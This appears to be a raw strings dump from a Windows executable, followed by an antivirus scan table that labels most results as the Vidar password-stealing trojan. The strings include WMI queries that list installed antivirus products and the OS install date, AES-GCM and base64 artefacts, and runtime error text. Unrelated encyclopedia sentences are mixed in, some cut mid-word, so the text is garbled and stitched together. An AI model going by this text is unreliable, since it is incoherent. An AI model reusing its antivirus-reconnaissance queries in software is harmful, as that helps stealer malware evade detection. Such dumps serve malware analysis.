929E9S9u9
>d?q?~?
=5=^={=
0,050M0V0n0w0
1,151d1m1
=H>T>a>q>~>
132@2{2
5W5d5m5z5
5 6,6_6{6
:%:4:\:}:
;;7;B;_;
=&>3>9>F>Z>j>o>|>
444A4I4q4
7 747:7G7
8%828;8H8`8m8u8~8
9"9/9C9H9p9
:B;S;`;f;l;x;
<$<0<L<R<^<
=W=g=t=y=~=
<>=M=X=^=
=6>>>D>J>h>}>
0U0\0c0:2J2x2
>R?_?o?
0G5L5f5
7R7r7x7}7
8$8)8/848:8?8E8M8U8]8e8m8u8
9$9,949<9D9L9[9e9
:!:):1:9:O:`:h:p:x:
; ;(;0;8;@;H;U;];e;m;u;};
<#<+<3<;<C<K<S<[<c<k<s<{<
<=%=2=8=D=J=P=V=[=a=g=m=r=x=~=
>>%>*>0>6><>A>G>M>S>X>^>d>j>o>u>{>
?"?'?-?3?8?>?D?I?O?U?Z?`?f?k?q?w?|?
0"0(0.03090?0E0J0U0b0h0n0s0y0
1 1&1+11171=1B1H1N1T1Y1_1e1k1p1v1|1
2#2(2.242:2?2E2K2Q2V2\2b2h2m2s2y2
3 3%3+31373<3B3H3N3S3Y3_3e3j3p3v3|3
4"4(4.44494>4D4J4O4T4Z4`4e4j4p4v4{4
5#5(5.54595?5E5J5P5V5[5`5f5k5q5z5
6"6(6.64696?6E6K6P6V6\6b6g6m6s6y6~6
7#7(7.7;7A7G7L7R7X7^7c7i7o7u7z7
8#8(8.848:8?8E8K8Q8V8\8b8h8m8s8y8
9&9,92979=9C9I9N9T9]9c9i9n9t9z9
:":(:.:3:9:?:E:J:O:U:[:`:e:k:q:v:|:
;!;';-;2;8;>;D;I;O;U;[;`;f;n;t;z;
7.7S7x7
<)<O<d<
3Y3g3n4|4J5X5
;$;8;E;X;e;w;
;4>,?6?>?
4@5F5.6O6
8 8&8,82888>8D8
8,9_9o9
90:C:q:d;
=L=S=`=f=
2>2I2Q2d2j2s2z2
213;3a3h3
3/484D4{4
4575A5\5d5j5x5
6X7]7o7
:':1:7:A:c:x:
;0;H;w;};
<(<-<=<B<H<N<d<k<t<
<8===w=|=
?D?g?r?x?
0H0b0|0c2j2p2
9'9[9f9p9
;"<.<A<S<n<v<~<
2.2@2R2d2v2
8"8P8U8_8i8s8}8
8?<?`?d?h?
5 5$5(5,5054585<5@5D5H5L5P5T5X5\5`5d5h5l5p5t5x5|5
6 6$6(6,6064686<6@6D6H6L6P6T6X6\6`6d6h6l6p6t6x6|6
6D?L?T?\?d?l?t?|?
>4>8>P>`>d>x>|>
? ?$?4?8?<?@?H?`?p?t?
0<0P0X0`0h0l0t0
101<1D1d1
282D2L2l2
3,303P3\3t3x3
4$4,40444<4P4X4`4h4l4p4x4
= =$=(=,=0=4=8=<=P=T=X=\=`=d=h=l=p=t=x=|=
> >$>(>,>0>4>8><>@>D>H>L>P>T>X>\>`>d>h>l>p>t>x>|>
? ?0?@?P?t?
5 5$5(5,585<5@5D5H5L5P5T5X5\5`5
jjjjjj
jjjjjj
QGAS5 noncoding RNA, which accumulates in growth arrested cells, acts as a decoy hormone response element for the glucocorticoid receptor (GR) and hence blocks the upregulation of gene expression by activated GR
The KLW SE10B is a low-emissions diesel switcher locomotive built by Knoxville Locomotive Works. It is powered by a single MTU Series 2000 engine which develops a total power output of 1,050 horsepower (783 kW). There have been three SE10B locomotives produced for New York New Jersey Rail, and a 5 have been produced for Chevron to be used in the refineries of Houston and Beaumont-Port Arthur, Texas.
Ici Radio-Canada T
(stylized as ICI Radio-Canada T
, and sometimes abbreviated as Ici T
) is a Canadian French-language free-to-air television network owned by the Canadian Broadcasting Corporation (known in French as Soci
Radio-Canada [SRC]), the national public broadcaster. Its English-language counterpart is CBC Television.
Niedert is an Ortsgemeinde
a municipality belonging to a Verbandsgemeinde, a kind of collective municipality
in the Rhein-Hunsr
ck-Kreis (district) in Rhineland-Palatinate, Germany. It belongs to the Verbandsgemeinde Hunsr
ck-Mittelrhein, whose seat is in Emmelshausen.
Organ perforation is a complete penetration of the wall of a hollow organ in the body, such as the gastrointestinal tract in the case of gastrointestinal perforation.
Chrysorabdia bivitta is a moth of the subfamily Arctiinae first described by Francis Walker in 1856.
0ChainingMode
ChainingModeGCM
InstallDate
Select * From Win32_OperatingSystem
ROOT\CIMV2
displayName
Select * From AntiVirusProduct
root\SecurityCenter2
image/jpeg
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=
I-11 was an Imperial Japanese Navy Type A1 submarine that served during World War II. Designed as a submarine aircraft carrier and submarine squadron flagship, she was commissioned in 1942.
The 1967 October Revolution Parade is the parade on Moscow's Red Square devoted to the 50th anniversary of the Great October Socialist Revolution on 7 November 1967. Commanding the parade was First Deputy Commander of the Moscow Military District, Colonel General Yevgeny Ivanovsky.
Oregon Ballot Measure 56 or House Joint Resolution 15 (HJR 15) is a legislatively referred constitutional amendment that enacted law which provides that property tax elections decided at May and November elections will be decided by a majority of voters who are voting in the relevant election.
The 1999 Rushmoor Council election took place on 6 May 1999 to elect members of Rushmoor Borough Council in Hampshire, England. One third of the council was up for election and the council stayed under no overall control
Taxonomic sequence (also known as systematic, phyletic or taxonomic order) is a sequence followed in listing of taxa which aids ease of use and roughly reflects the evolutionary relationships among the taxa. Taxonomic sequences can exist for taxa within any rank, that is, a list of families, genera, species can each have a sequence.
mscoree.dll
runtime error
TLOSS error
SING error
DOMAIN error
- Attempt to use MSIL code from this assembly during native code initialization
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
- not enough space for locale information
- Attempt to initialize the CRT more than once.
This indicates a bug in your application.
- CRT not initialized
- unable to initialize heap
- not enough space for lowio initialization
- not enough space for stdio initialization
- pure virtual function call
- not enough space for _onexit/atexit table
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
- not enough space for thread data
- abort() has been called
- not enough space for environment
- not enough space for arguments
- floating point support not loaded
BMicrosoft Visual C++ Runtime Library
<program name unknown>
Runtime Error!
Program:
KERNEL32.DLL
WUSER32.DLL
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
((((( H
h(((( H
H
Antivirus Signature
Bkav W32.AIDetectMalware
Lionic Trojan.Win32.Vidar.4!c
tehtris Clean
ClamAV Win.Packed.Mikey-10032681-0
CMC Clean
CAT-QuickHeal Clean
Skyhigh BehavesLike.Win32.TrojanAitInject.dh
ALYac Gen:Variant.Zusy.554706
Cylance Unsafe
Zillya Trojan.Stealerc.Win32.34245
Sangfor Infostealer.Win32.Vidar.Vzs0
K7AntiVirus Trojan ( 005a977a1 )
Alibaba TrojanSpy:Win32/Vidar.bdb6b722
K7GW Trojan ( 005a977a1 )
Cybereason malicious.3f9ec8
Baidu Clean
VirIT Trojan.Win32.GenusT.DYDF
Paloalto generic.ml
Symantec ML.Attribute.HighConfidence
Elastic Windows.Generic.Threat
ESET-NOD32 a variant of Win32/Vidar.A
APEX Malicious
Avast Win64:MalwareX-gen [Trj]
Cynet Malicious (score: 100)
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Gen:Variant.Zusy.554706
NANO-Antivirus Trojan.Win32.Steam.kpcvrv
ViRobot Clean
MicroWorld-eScan Gen:Variant.Zusy.554706
Tencent Malware.Win32.Gencirc.10c00e5a
TACHYON Clean
Sophos Mal/EncPk-YG
F-Secure Trojan.TR/Crypt.ZPACK.Gen
DrWeb Trojan.PWS.Vidar.43
VIPRE Gen:Variant.Zusy.554706
TrendMicro TrojanSpy.Win32.VIDAR.YXEGGZ
McAfeeD Real Protect-LS!7DEBC473F9EC
Trapmine malicious.high.ml.score
FireEye Generic.mg.7debc473f9ec83c3
Emsisoft Gen:Variant.Zusy.554706 (B)
SentinelOne Static AI - Malicious PE
GData Gen:Variant.Zusy.554706
Jiangmin Clean
Webroot W32.Trojan.TR.Crypt.ZPACK
Varist Clean
Avira TR/Crypt.ZPACK.Gen
Antiy-AVL Trojan[PSW]/Win32.Vidar
Kingsoft malware.kb.a.1000
Gridinsoft Spy.Win32.Vidar.tr
Xcitium Clean
Arcabit Trojan.Zusy.D876D2
SUPERAntiSpyware Clean
ZoneAlarm UDS:DangerousObject.Multi.Generic
Microsoft Trojan:Win32/Znyonm
Google Detected
AhnLab-V3 Trojan/Win.Generic.R656990
Acronis Clean
McAfee Artemis!7DEBC473F9EC
MAX malware (ai score=88)
VBA32 BScope.Trojan.Agent
Malwarebytes Spyware.PasswordStealer
Panda Clean
Zoner Clean
TrendMicro-HouseCall TrojanSpy.Win32.VIDAR.YXEGGZ
Rising Stealer.Stealerc!8.17BE0 (TFE:4:u7OjaJEcchS)
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet W32/Vidar.A!tr
BitDefenderTheta AI:Packer.F892495C1F
AVG Win64:MalwareX-gen [Trj]
DeepInstinct MALICIOUS
CrowdStrike win/malicious_confidence_90% (D)
alibabacloud Backdoor:Win/Cometer.C
No IRMA results available.